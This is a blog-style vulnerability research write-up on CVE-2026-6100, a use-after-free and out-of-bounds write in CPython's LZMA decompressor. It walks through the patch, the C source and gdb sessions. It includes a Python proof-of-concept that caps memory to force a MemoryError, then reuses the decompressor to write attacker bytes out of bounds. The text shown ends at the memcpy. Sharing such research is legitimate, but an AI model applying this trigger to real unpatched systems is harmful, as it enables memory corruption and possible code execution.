Exploiting CVE-2026-6100 for Amusement and Misery
6550 words | 31 minutes
So, according to my phone’s screen time statistics, I spend, on average, about 1.5 hours of a day on Twitter dot com, usually ranging from 1h to 2h. I’d open the app up to 125 times with an average of about 90? opens in a day, which means I quite literally spend, on average ($\mu$), about a minute doomscrolling at a time. The data is probably a lot more left skewed ‘cause there’s definitely moments where I open Twitter for, like, ten seconds, wonder what the hell I’m doing with my life, then close it.
Anyways, the other day I got this tweet on my feed, sandwiched between a 480p recording of Ninajirachi x Porter Robinson’s Wannacry (and that’s a good song title!) and a tweet announcing new Needy Streamer Overload merch:
![]() |
|---|
| Fig: The Tweet |
I know the words “Python” and “Use-after-free”. I haven’t documented trying to write a CVE PoC before. Let’s see if we can create a full exploit chain with this!
The Bug
The Bug is the pseudonym of Kevin Martin, an extremely prolific UK producer and musician. He was a member of GOD, one of the best jazzcore and industrial metal bands of all time, and under the moniker of The Bug he produces real eclectic grime/hip-hop/industrial/dancehall/dubstep. First time I ever heard of him was that one-off single he made with Death Grips.
Anyway, let’s read the CVE report and try to understand what’s going on.
The CVE Report
The CVE report in full reads as such:
Use-after-free in lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile after re-use under memory pressure
Use-after-free (UAF) was possible in the lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile when a memory allocation fails with a MemoryError and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a MemoryError is raised during decompression. Using the helper functions to one-shot decompress data such as lzma.decompress(), bz2.decompress(), gzip.decompress(), and zlib.decompress() are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.
So, some things to note:
- This is exploitable under “memory pressure”. This… will become important later.
- This requires the reuse of a decompressor instance even after a
MemoryErroroccurs. - This affects the Python implementations of LZMA, BZ2 and Gzip, which implies some shared logic fault in their implementations.
- Not included in the Description but instead down below under the CWEs, it’s stated that this is both a UAF and an OOB Write. Huh!
Well, send patches or die, right? Let’s see what the actual fix looks like for the affected modules.
The Fix
Here’s the pull request with the fixes implemented. We’ve got four files changed and… ooh. It really is just a UAF cleanup edit.
![]() |
|---|
| Fig: The Fixes |
In the three affected decompression modules, there’s just a line added to each of their decompression functions to clear out some next_in field on error. Well, with the limited information that we have, let’s start working backwards through one of them.
LZMA has the coolest name of the bunch, so I’m gonna go with that, naturally.
Understanding _lzmamodule.c
We’re reverse engineers, so we read our code in reverse too!
Let’s start from the very end, the error block that we’re so concerned with:
1101...
1102error:
1103 lzs->next_in = NULL;
1104 Py_XDECREF(result);
1105 return NULL;
1106}
Recall that we’re supposed to hit this error block through a MemoryError of sorts. Looking at our gotos, we’ve got a candidate:
1084 /* Allocate if necessary */
1085 if (d->input_buffer == NULL) {
1086 d->input_buffer = PyMem_Malloc(lzs->avail_in);
1087 if (d->input_buffer == NULL) {
1088 PyErr_SetNone(PyExc_MemoryError);
1089 goto error;
1090 }
1091 d->input_buffer_size = lzs->avail_in;
1092 }
So if we somehow hit the condition of d->input_buffer being NULL, it will trigger a PyMem_Malloc requesting size lzs->avail_in, which on failure will raise a MemoryError and fallthrough to the error block. So far, so good. What the fuck are d and lzs?
983static PyObject *
984decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
985{
986 char input_buffer_in_use;
987 PyObject *result;
988 lzma_stream *lzs = &d->lzs;
989...
Okay, cool. Decompressor struct and lzma_stream struct. The Decompressor is defined in this file, thankfully:
111typedef struct {
112 PyObject_HEAD
113 lzma_allocator alloc;
114 lzma_stream lzs;
115 int check;
116 char eof;
117 PyObject *unused_data;
118 char needs_input;
119 uint8_t *input_buffer;
120 size_t input_buffer_size;
121 PyMutex mutex;
122} Decompressor;
But our lzma_stream struct isn’t. It comes from lzma.h, which comes from liblzma. Digging around for some source code yields us the following struct:
typedef struct {
const uint8_t *next_in; /**< Pointer to the next input byte. */
size_t avail_in; /**< Number of available input bytes in next_in. */
uint64_t total_in; /**< Total number of bytes read by liblzma. */
uint8_t *next_out; /**< Pointer to the next output position. */
size_t avail_out; /**< Amount of free space in next_out. */
uint64_t total_out; /**< Total number of bytes written by liblzma. */
lzma_allocator *allocator;
/** Internal state is not visible to applications. */
lzma_internal *internal;
void *reserved_ptr1;
void *reserved_ptr2;
void *reserved_ptr3;
void *reserved_ptr4;
uint64_t reserved_int1;
uint64_t reserved_int2;
size_t reserved_int3;
size_t reserved_int4;
lzma_reserved_enum reserved_enum1;
lzma_reserved_enum reserved_enum2;
} lzma_stream;
Nice, let’s start tracing the decompress function from the top down to see how to hit our block of interest.
983static PyObject *
984decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
985{
986 char input_buffer_in_use;
987 PyObject *result;
988 lzma_stream *lzs = &d->lzs;
989
990 /* Prepend unconsumed input if necessary */
991 if (lzs->next_in != NULL) {
992 size_t avail_now, avail_total;
993
994 /* Number of bytes we can append to input buffer */
995 avail_now = (d->input_buffer + d->input_buffer_size)
996 - (lzs->next_in + lzs->avail_in);
997 ...
998 /* BLAH BLAH BLAH */
999 memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
1000 lzs->avail_in += len;
1001 input_buffer_in_use = 1;
1002 }
1003 else {
1004 lzs->next_in = data;
1005 lzs->avail_in = len;
1006 input_buffer_in_use = 0;
1007 }
1008
1009 result = decompress_buf(d, max_length);
1010 if (result == NULL) {
1011 lzs->next_in = NULL;
1012 return NULL;
1013 }
1014...
I’ve glossed over the first block that checks if lzs->next_in != NULL because the comment above it explicitly states “Prepend unconsumned input if necessary”, implying this is unlikely to be called on a first pass. Recall that our vulnerability hinges on a reuse, so the first time the function is called, it probably wouldn’t be trying to handle unconsumed input…? In fact, lzs is probably mostly uninitialised (this assumption will turn out to be true), so the relevant block is just the one where the next_in and avail_in fields are being set.
The Python code that would call this function would look a little like this:
import lzma
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(b'[data_goes_here]', max_length)
Where data and len are drawn from, well, the data you pass in.
This is followed up by a call to decompress_buf, which is the handover function that actually calls lzma_code.
921/* Decompress data of length d->lzs.avail_in in d->lzs.next_in. The output
922 buffer is allocated dynamically and returned. At most max_length bytes are
923 returned, so some of the input may not be consumed. d->lzs.next_in and
924 d->lzs.avail_in are updated to reflect the consumed input. */
925static PyObject*
926decompress_buf(Decompressor *d, Py_ssize_t max_length)
927{
928 PyObject *result;
929 lzma_stream *lzs = &d->lzs;
930 _BlocksOutputBuffer buffer = {.writer = NULL};
931 _lzma_state *state = PyType_GetModuleState(Py_TYPE(d));
932 assert(state != NULL);
933
934 if (OutputBuffer_InitAndGrow(&buffer, max_length, &lzs->next_out, &lzs->avail_out) < 0) {
935 goto error;
936 }
937
938 for (;;) {
939 lzma_ret lzret;
940
941 Py_BEGIN_ALLOW_THREADS
942 lzret = lzma_code(lzs, LZMA_RUN);
943 Py_END_ALLOW_THREADS
944
945 if (lzret == LZMA_BUF_ERROR && lzs->avail_in == 0 && lzs->avail_out > 0) {
946 lzret = LZMA_OK; /* That wasn't a real error */
947 }
948 if (catch_lzma_error(state, lzret)) {
949 goto error;
950 }
951 if (lzret == LZMA_GET_CHECK || lzret == LZMA_NO_CHECK) {
952 FT_ATOMIC_STORE_INT_RELAXED(d->check, lzma_get_check(&d->lzs));
953 }
954 if (lzret == LZMA_STREAM_END) {
955 FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
956 break;
957 } else if (lzs->avail_out == 0) {
958 /* Need to check lzs->avail_out before lzs->avail_in.
959 Maybe lzs's internal state still have a few bytes
960 can be output, grow the output buffer and continue
961 if max_lengh < 0. */
962 if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
963 break;
964 }
965 if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
966 goto error;
967 }
968 } else if (lzs->avail_in == 0) {
969 break;
970 }
971 }
972
973 result = OutputBuffer_Finish(&buffer, lzs->avail_out);
974 if (result != NULL) {
975 return result;
976 }
977
978error:
979 OutputBuffer_OnError(&buffer);
980 return NULL;
981}
This function cannot fail/return NULL as it’ll kill off the rest of our decompress call (this is called foreshadowing). Additionally, we get a sense for what max_length does here, which the docstring actually does elucidate further:
If max_length is nonnegative, returns at most max_length bytes of decompressed data. If this limit is reached and further output can be produced, self.needs_input will be set to False. In this case, the next call to decompress() may provide data as b'' to obtain more of the output.
So this is how we get our partial decompression: by calling decompress with a max_length value that is shorter than the full decompressed buffer.
Looking at the if blocks that come after, we can see what conditions we need to miss:
1041 if (d->eof) {
1042 FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
1043 if (lzs->avail_in > 0) {
1044 PyObject *unused_data = PyBytes_FromStringAndSize(
1045 (char *)lzs->next_in, lzs->avail_in);
1046 if (unused_data == NULL) {
1047 goto error;
1048 }
1049 Py_XSETREF(d->unused_data, unused_data);
1050 }
1051 }
1052 else if (lzs->avail_in == 0) {
1053 lzs->next_in = NULL;
1054
1055 if (lzs->avail_out == 0) {
1056 /* (avail_in==0 && avail_out==0)
1057 Maybe lzs's internal state still have a few bytes can
1058 be output, try to output them next time. */
1059 FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
1060
1061 /* If max_length < 0, lzs->avail_out always > 0 */
1062 assert(max_length >= 0);
1063 } else {
1064 /* Input buffer exhausted, output buffer has space. */
1065 FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 1);
1066 }
1067 }
1068 else {
1069 // the actual block we want to hit
1070 ...
So we can’t allow d->eof to be set high. This only happens in decompress_buf if lzret == LZMA_STREAM_END, so we will pass by this easily since we’re not consuming the full stream.
Similarly, we coast past lzs->avail_in == 0 as we intentionally leave some residual data, so these if blocks aren’t really a problem.
Now, what happens when you call the function again? Before the patch, the lzs->next_in field doesn’t get NULLd out. We know that this will contain a pointer to our input data of sorts (does it get advanced or modified during the call to lzma_code? Easiest way to find out is by debugging later!), so let’s actually trace the non-NULL block of decompress now:
991 if (lzs->next_in != NULL) {
992 size_t avail_now, avail_total;
993
994 /* Number of bytes we can append to input buffer */
995 avail_now = (d->input_buffer + d->input_buffer_size)
996 - (lzs->next_in + lzs->avail_in);
997
998 /* Number of bytes we can append if we move existing
999 contents to beginning of buffer (overwriting
1000 consumed input) */
1001 avail_total = d->input_buffer_size - lzs->avail_in;
1002
1003 if (avail_total < len) {
1004 size_t offset = lzs->next_in - d->input_buffer;
1005 uint8_t *tmp;
1006 size_t new_size = d->input_buffer_size + len - avail_now;
1007
1008 /* Assign to temporary variable first, so we don't
1009 lose address of allocated buffer if realloc fails */
1010 tmp = PyMem_Realloc(d->input_buffer, new_size);
1011 if (tmp == NULL) {
1012 PyErr_SetNone(PyExc_MemoryError);
1013 return NULL;
1014 }
1015 d->input_buffer = tmp;
1016 d->input_buffer_size = new_size;
1017
1018 lzs->next_in = d->input_buffer + offset;
1019 }
1020 else if (avail_now < len) {
1021 memmove(d->input_buffer, lzs->next_in,
1022 lzs->avail_in);
1023 lzs->next_in = d->input_buffer;
1024 }
1025 memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
1026 lzs->avail_in += len;
1027 input_buffer_in_use = 1;
1028 }
Eyeballing this, we can see where the OOB Write is. It’s probably all the way down at the end, with that pesky memcpy. We have a dangling pointer to data (or something related) since we never cleared out lzs->next_in, and now it will copy whatever new data we’re passing in to an address past that. If next_in and avail_in are untouched by the previous call, we actually just get a direct OOB Write to whatever memory lies right after the original data!
Okay, so we’ve got a rough idea of what’s going on. Pretty straightforward, too:
- Somehow trigger the
MemoryErrorforPyMem_Malloc(lzs->avail_in). - Call
decompresson the sameDecompressorobject with the residual data in thelzsstruct, which should trigger an OOB Write of arbitrary data to the position right after the original data.
So, shall we?
Pressure Torture
On Venetian Snares’ album “Doll Doll Doll”, there’s a track called “Pressure Torture”. It’s a 7:49 minute track of pummelling snares, bass strikes and, of course, utterly fucked up chopped Amen Breaks. It’s music made to beat you up; hardly for pleasure, hardly for enjoyment.
Anyways, we need to somehow get PyMem_Malloc to fail. The CVE report gives us a clue: “This scenario can be triggered if the process is under memory pressure.”.
Let’s do a little bit of debugging to figure out how we can attain that pressure.
Tracing the decompress Call
I am a staunch believer that you don’t always need symbols during debugging. If you’re good, you should just be able to eyeball the structs and see where the data should be without needing text all over the fucking place.
However, I decided to give in for once and compiled the last Python commit prior to this patch (480edc1aae0) in debug mode by throwing in a nifty little ./configure --with-pydebug CFLAGS="-g3 -O0". Blasphemous.
Let’s write a simple script to test the decompress function:
import lzma
decompressor = lzma.LZMADecompressor()
# we need to start with some valid data at first, at least
t = bytearray(b'asdfgda')
t = lzma.compress(t)
a = decompressor.decompress(t, 1)
We can then set a breakpoint in gdb by calling b ../Modules/_lzmamodule.c:decompress to begin tracing.
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
[1m[38;5;240m0x7ffff7b2d0db <decompress+000c> mov QWORD PTR [rbp-0x70], rsi[0m
[1m[38;5;240m0x7ffff7b2d0df <decompress+0010> mov QWORD PTR [rbp-0x78], rdx[0m
[1m[38;5;240m0x7ffff7b2d0e3 <decompress+0014> mov QWORD PTR [rbp-0x80], rcx[0m
[31m●[32m→ 0x7ffff7b2d0e7 <decompress+0018> mov rax, QWORD PTR [rbp-0x68][39m
0x7ffff7b2d0eb <decompress+001c> add rax, 0x28
0x7ffff7b2d0ef <decompress+0020> mov QWORD PTR [rbp-0x50], rax
0x7ffff7b2d0f3 <decompress+0024> mov rax, QWORD PTR [rbp-0x50]
0x7ffff7b2d0f7 <decompress+0028> mov rax, QWORD PTR [rax]
0x7ffff7b2d0fa <decompress+002b> test rax, rax
[1m[38;5;240m─────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+988[1m[38;5;240m ────[0m
[1m[38;5;240m 983[0m [1m[38;5;240m static PyObject *[0m
[1m[38;5;240m 984[0m [1m[38;5;240m decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)[0m
[1m[38;5;240m 985[0m [1m[38;5;240m {[0m
[1m[38;5;240m 986[0m [1m[38;5;240m char input_buffer_in_use;
[0m [1m[38;5;240m 987[0m [1m[38;5;240m PyObject *result;[0m
// [33md[39m=0x00007fffffff9ea8 → [...] → 0x0000000000000002, [33mlzs[39m=0x00007fffffff9ec0 → 0x0000000001000000
[32m → 988[39m [32m lzma_stream *lzs = &d->lzs;[39m
989
990 /* Prepend unconsumed input if necessary */
991 if (lzs->next_in != NULL) {
992 size_t avail_now, avail_total;
993
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────────── [0m[36mthreads[1m[38;5;240m ────[0m
[[32m#0[39m] Id 1, Name: "python", [31mstopped[39m [34m0x7ffff7b2d0e7[39m in [33mdecompress[39m (), reason: [35mBREAKPOINT[39m
Here we can start checking off some of our assumptions. Stepping a little then pretty printing the lzma_stream struct at this point shows us it is, in fact, largely uninitialized:
[1m[32mgef➤ [0mprint *(lzma_stream *) 0x00007ffff7c2e468
[36m$3[39m = {
[36mnext_in[39m = [34m0x0[39m,
[36mavail_in[39m = 0x0,
[36mtotal_in[39m = 0x0,
[36mnext_out[39m = [34m0x0[39m,
[36mavail_out[39m = 0x0,
[36mtotal_out[39m = 0x0,
[36mallocator[39m = [34m0x7ffff7c2e450[39m,
[36minternal[39m = [34m0x555555ec8a10[39m,
[36mreserved_ptr1[39m = [34m0x0[39m,
[36mreserved_ptr2[39m = [34m0x0[39m,
[36mreserved_ptr3[39m = [34m0x0[39m,
[36mreserved_ptr4[39m = [34m0x0[39m,
[36mseek_pos[39m = 0x0,
[36mreserved_int2[39m = 0x0,
[36mreserved_int3[39m = 0x0,
[36mreserved_int4[39m = 0x0,
[36mreserved_enum1[39m = [36mLZMA_RESERVED_ENUM[39m,
[36mreserved_enum2[39m = [36mLZMA_RESERVED_ENUM[39m
}
and it will get filled in with our input compressed data once we go further in:
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
[1m[38;5;240m0x7ffff7b2d29d <decompress+01ce> mov rax, QWORD PTR [rbp-0x50][0m
[1m[38;5;240m0x7ffff7b2d2a1 <decompress+01d2> mov rdx, QWORD PTR [rbp-0x78][0m
[1m[38;5;240m0x7ffff7b2d2a5 <decompress+01d6> mov QWORD PTR [rax+0x8], rdx[0m
[32m→ 0x7ffff7b2d2a9 <decompress+01da> mov BYTE PTR [rbp-0x51], 0x0[39m
0x7ffff7b2d2ad <decompress+01de> mov rdx, QWORD PTR [rbp-0x80]
0x7ffff7b2d2b1 <decompress+01e2> mov rax, QWORD PTR [rbp-0x68]
0x7ffff7b2d2b5 <decompress+01e6> mov rsi, rdx
0x7ffff7b2d2b8 <decompress+01e9> mov rdi, rax
0x7ffff7b2d2bb <decompress+01ec> call 0x7ffff7b2cec7 <decompress_buf>
[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1032[1m[38;5;240m ────[0m
[1m[38;5;240m 1027[0m [1m[38;5;240m input_buffer_in_use = 1;[0m
[1m[38;5;240m 1028[0m [1m[38;5;240m }[0m
[1m[38;5;240m 1029[0m [1m[38;5;240m else {[0m
[1m[38;5;240m 1030[0m [1m[38;5;240m lzs->next_in = data;[0m
[1m[38;5;240m 1031[0m [1m[38;5;240m lzs->avail_in = len;[0m
// [33minput_buffer_in_use[39m=0x0
[32m → 1032[39m [32m input_buffer_in_use = 0;[39m
1033 }
1034
1035 result = decompress_buf(d, max_length);
1036 if (result == NULL) {
1037 lzs->next_in = NULL;
...
[1m[38;5;240m────────────────────────────────────────────────────────────────────────────────────────────────────[0m
[1m[32mgef➤ [0mprint *(lzma_stream *) 0x00007ffff7c2e468
[36m$4[39m = {
[36mnext_in[39m = [34m0x7ffff77b9ce0[39m "\3757zXZ",
[36mavail_in[39m = 0x40,
[36mtotal_in[39m = 0x0,
[36mnext_out[39m = [34m0x0[39m,
[36mavail_out[39m = 0x0,
...
We continue execution past decompress_buf to see how this changes our structs:
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
[1m[38;5;240m0x7ffff7b2d2b5 <decompress+01e6> mov rsi, rdx[0m
[1m[38;5;240m0x7ffff7b2d2b8 <decompress+01e9> mov rdi, rax[0m
[1m[38;5;240m0x7ffff7b2d2bb <decompress+01ec> call 0x7ffff7b2cec7 <decompress_buf>[0m
[31m●[32m→ 0x7ffff7b2d2c0 <decompress+01f1> mov QWORD PTR [rbp-0x20], rax[39m
0x7ffff7b2d2c4 <decompress+01f5> cmp QWORD PTR [rbp-0x20], 0x0
0x7ffff7b2d2c9 <decompress+01fa> jne 0x7ffff7b2d2e0 <decompress+529>
0x7ffff7b2d2cb <decompress+01fc> mov rax, QWORD PTR [rbp-0x50]
0x7ffff7b2d2cf <decompress+0200> mov QWORD PTR [rax], 0x0
0x7ffff7b2d2d6 <decompress+0207> mov eax, 0x0
...
[1m[32mgef➤ [0mprint *(Decompressor *)0x00007fffffff9ea8
[36m$5[39m = {
[36mob_base[39m = {
{
[36mob_refcnt_full[39m = 0x7ffff7c2e440,
{
[36mob_refcnt[39m = 0xf7c2e440,
[36mob_overflow[39m = 0x7fff,
[36mob_flags[39m = 0x0
},
[36m_aligner[39m = 0x40
},
[36mob_type[39m = [34m0x7fffffff9ed0[39m
},
...
[36mcheck[39m = 0xf7b2c04f,
[36meof[39m = 0xff,
[36munused_data[39m = [34m0x0[39m,
[36mneeds_input[39m = 0x2,
[36minput_buffer[39m = [34m0x7fffffffa1c0[39m "\300\234{\367\377\177",
[36minput_buffer_size[39m = 0x7ffff7c2e440,
[36mmutex[39m = {
[36m_bits[39m = 0xa0
}
}
[1m[32mgef➤ [0mprint *(lzma_stream *)0x7ffff7c2e468
[36m$7[39m = {
[36mnext_in[39m = [34m0x7ffff77b9cfc[39m "sdfgda",
[36mavail_in[39m = 0x24,
[36mtotal_in[39m = 0x1c,
[36mnext_out[39m = [34m0x7ffff7bd1341[39m "",
[36mavail_out[39m = 0x0,
[36mtotal_out[39m = 0x1,
[36mallocator[39m = [34m0x7ffff7c2e450[39m,
[36minternal[39m = [34m0x555555ec8a10[39m,
[36mreserved_ptr1[39m = [34m0x0[39m,
[36mreserved_ptr2[39m = [34m0x0[39m,
[36mreserved_ptr3[39m = [34m0x0[39m,
[36mreserved_ptr4[39m = [34m0x0[39m,
[36mseek_pos[39m = 0x0,
[36mreserved_int2[39m = 0x0,
[36mreserved_int3[39m = 0x0,
[36mreserved_int4[39m = 0x0,
[36mreserved_enum1[39m = [36mLZMA_RESERVED_ENUM[39m,
[36mreserved_enum2[39m = [36mLZMA_RESERVED_ENUM[39m
}
Note that next_in now contains the remaining data, decompressed. This is likely because we passed in a very short string, so it just decompresses the whole block and goes on its merry way. Notice the changes to avail_in, total_in, avail_out, and total_out too. total_out directly reflects the amount of data we requested, while total_in goes up by 0x1c as that’s the length we’ve ingested (and thus incremented next_in by).
Also, notice how d->eof remains at 0xff and lzs->avail_in is non-zero, which means we will very cleanly fall into our target if block to trigger the bug!
Making PyMem_Malloc Fail
So this is the annoying bit. Intuitively, a malloc operation would only fail if for some reason, the program is unable to serve the amount of free memory requested in that malloc request. It seems unlikely that during decompression we somehow manage to assign an obscene length to lzs->avail_in, nor would there be a way to restore it to a reasonable value afterwards.
This is where the earlier statement on “memory pressure” comes in. If we manage to get the program to be in a memory exhausted state with a sufficiently fractured heap, then even a “smaller” allocation request for something like, I dunno, a megabyte? would fail.
So we need to tune our resource allocation in such a way that there’s enough free memory for everything (that is, up till decompress_buf returning) to carry on with no errors, but the moment we hit that PyMem_Malloc the program goes kaput.
We can artificially restrict the resource limits of a Python script with the following:
import resource
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)
limit = 64 * 1024 * 1024 # 64 MB
# this will set a 64 MB memory cap on the program
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))
# this will restore the original resources
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
We can now experiment with our limits a bit. I compress some high entropy data (i.e. I ran lzma.compress(os.urandom(2*1024*1024)))) which would create both a large compressed buffer and a large uncompressed buffer. Then, we just start playing around with our resource limits until we hit something nice.
import resource
import lzma
# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(c, 1)
This is juuuuust nice. We manage to make it through decompress_buf without it dying there, and we hit the error path that we want.
[ Legend: [31mModified register[39m | [31mCode[39m | [32mHeap[39m | [35mStack[39m | [33mString[39m ]
[1m[38;5;240m───────────────────────────────────────────────────────────────────────────────────── [0m[36mregisters[1m[38;5;240m ────[0m
[31m$rax [39m: 0x0
[34m$rbx [39m: 0x00007ffff7c555dc → 0x0a73000000000001
[31m$rcx [39m: 0x0
[31m$rdx [39m: 0xffffffffffffff80
...
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
[1m[38;5;240m0x7ffff7b2644f <decompress+0380> mov rax, QWORD PTR [rax+0x8][0m
[1m[38;5;240m0x7ffff7b26453 <decompress+0384> mov rdi, rax[0m
[1m[38;5;240m0x7ffff7b26456 <decompress+0387> call 0x7ffff7b234b0 <PyMem_Malloc@plt>[0m
[31m●[32m→ 0x7ffff7b2645b <decompress+038c> mov rdx, QWORD PTR [rbp-0x68][39m
0x7ffff7b2645f <decompress+0390> mov QWORD PTR [rdx+0xc8], rax
0x7ffff7b26466 <decompress+0397> mov rax, QWORD PTR [rbp-0x68]
0x7ffff7b2646a <decompress+039b> mov rax, QWORD PTR [rax+0xc8]
0x7ffff7b26471 <decompress+03a2> test rax, rax
0x7ffff7b26474 <decompress+03a5> jne 0x7ffff7b2648a <decompress+955>
...
Notice how $rax is 0x0 following the PyMem_Malloc call, implying it failed and we will fallthrough to our error block, which we do!
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
[1m[38;5;240m0x7ffff7b264d4 <decompress+0405> mov rax, QWORD PTR [rbp-0x20][0m
[1m[38;5;240m0x7ffff7b264d8 <decompress+0409> jmp 0x7ffff7b264ec <decompress+1053>[0m
[1m[38;5;240m0x7ffff7b264da <decompress+040b> nop [0m
[32m→ 0x7ffff7b264db <decompress+040c> mov rax, QWORD PTR [rbp-0x20][39m
0x7ffff7b264df <decompress+0410> mov rdi, rax
0x7ffff7b264e2 <decompress+0413> call 0x7ffff7b2393d <Py_XDECREF>
0x7ffff7b264e7 <decompress+0418> mov eax, 0x0
0x7ffff7b264ec <decompress+041d> leave
0x7ffff7b264ed <decompress+041e> ret
[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1103[1m[38;5;240m ────[0m
[1m[38;5;240m 1098[0m [1m[38;5;240m }[0m
[1m[38;5;240m 1099[0m [1m[38;5;240m [0m
[1m[38;5;240m 1100[0m [1m[38;5;240m return result;[0m
[1m[38;5;240m 1101[0m [1m[38;5;240m [0m
[1m[38;5;240m 1102[0m [1m[38;5;240m error:[0m
// [33mresult[39m=0x00007fffffff9ef0 → [...] → [1m[38;5;240m<_PyRuntime+10e80> add BYTE PTR [rax], al[0m
[32m → 1103[39m [32m Py_XDECREF(result);[39m
1104 return NULL;
1105 }
1106
1107 /*[clinic input]
1108 @permit_long_docstring_body
Purrrrrfect. This was done through just trial and error, and for reasons that’ll become apparent later, we’re going to need better methods. Either way, we get our PyMem_Malloc failure here, so trigger the bug should be trivial from here!
Triggering the Bug
As we’ve figure out, we need to catch our MemoryError that decompress will throw, then call decompress one more time with some input data which should get memcpy’d OOB. Let’s update our script to reflect this:
import resource
import lzma
# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")
# so our memory exhaustion is a bit the very tight
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = None
try:
input(f"Decompressor is at {hex(id(decompressor))}")
a = decompressor.decompress(c, 1)
except MemoryError:
pass
finally:
# restore our resources so we struggle less post-bug
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))
input("MemError triggered, decompressing again")
a = decompressor.decompress(b'A'*16, 1)
We now just step through our script in gdb and see what happens on the decompress calls! After falling through to the error block in the first call, we can check what our lzma_stream struct looks like, knowing that it doesn’t get cleared out properly:
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
[1m[38;5;240m0x7ffff7b264e2 <decompress+0413> call 0x7ffff7b2393d <Py_XDECREF>[0m
[1m[38;5;240m0x7ffff7b264e7 <decompress+0418> mov eax, 0x0[0m
[1m[38;5;240m0x7ffff7b264ec <decompress+041d> leave [0m
[32m→ 0x7ffff7b264ed <decompress+041e> ret [39m
...
[1m[32mgef➤ [0mprint *(lzma_stream *)0x7ffff7c2e468
[36m$13[39m = {
[36mnext_in[39m = [34m0x7ffff6bda06c[39m "\020J\022_%\"\024\377\017\276\226dwW*\3568\330&...,
[36mavail_in[39m = 0x100054,
[36mtotal_in[39m = 0x1c,
[36mnext_out[39m = [34m0x7ffff7bd1341[39m "",
[36mavail_out[39m = 0x0,
[36mtotal_out[39m = 0x1,
[36mallocator[39m = [34m0x7ffff7c2e450[39m,
[36minternal[39m = [34m0x555555e53b50[39m,
[36mreserved_ptr1[39m = [34m0x0[39m,
[36mreserved_ptr2[39m = [34m0x0[39m,
[36mreserved_ptr3[39m = [34m0x0[39m,
[36mreserved_ptr4[39m = [34m0x0[39m,
[36mseek_pos[39m = 0x0,
[36mreserved_int2[39m = 0x0,
[36mreserved_int3[39m = 0x0,
[36mreserved_int4[39m = 0x0,
[36mreserved_enum1[39m = [36mLZMA_RESERVED_ENUM[39m,
[36mreserved_enum2[39m = [36mLZMA_RESERVED_ENUM[39m
}
Now, let’s continue on to the second decompress call.
We of course pass the lzs->next_in != NULL check, and both the calculated avail_now and avail_total are negative (since input_buffer and input_buffer_size in d are 0, so we just… get negative numbers), bypassing the PyMem_Realloc and memmove logic. We now land on the memcpy as expected!
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────── [0m[36marguments (guessed)[1m[38;5;240m ────[0m
memcpy@plt (
[34m$rdi[39m = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00,
[34m$rsi[39m = 0x00007ffff77e8c40 → [33m"AAAAAAAAAAAAAAAA"[39m,
[34m$rdx[39m = 0x0000000000000010,
[34m$rcx[39m = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00
)
[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1025[1m[38;5;240m ────[0m
[1m[38;5;240m 1020[0m [1m[38;5;240m else if (avail_now < len) {[0m
[1m[38;5;240m 1021[0m [1m[38;5;240m memmove(d->input_buffer, lzs->next_in,[0m
[1m[38;5;240m 1022[0m [1m[38;5;240m lzs->avail_in);[0m
[1m[38;5;240m 1023[0m [1m[38;5;240m lzs->next_in = d->input_buffer;[0m
[1m[38;5;240m 1024[0m [1m[38;5;240m }[0m
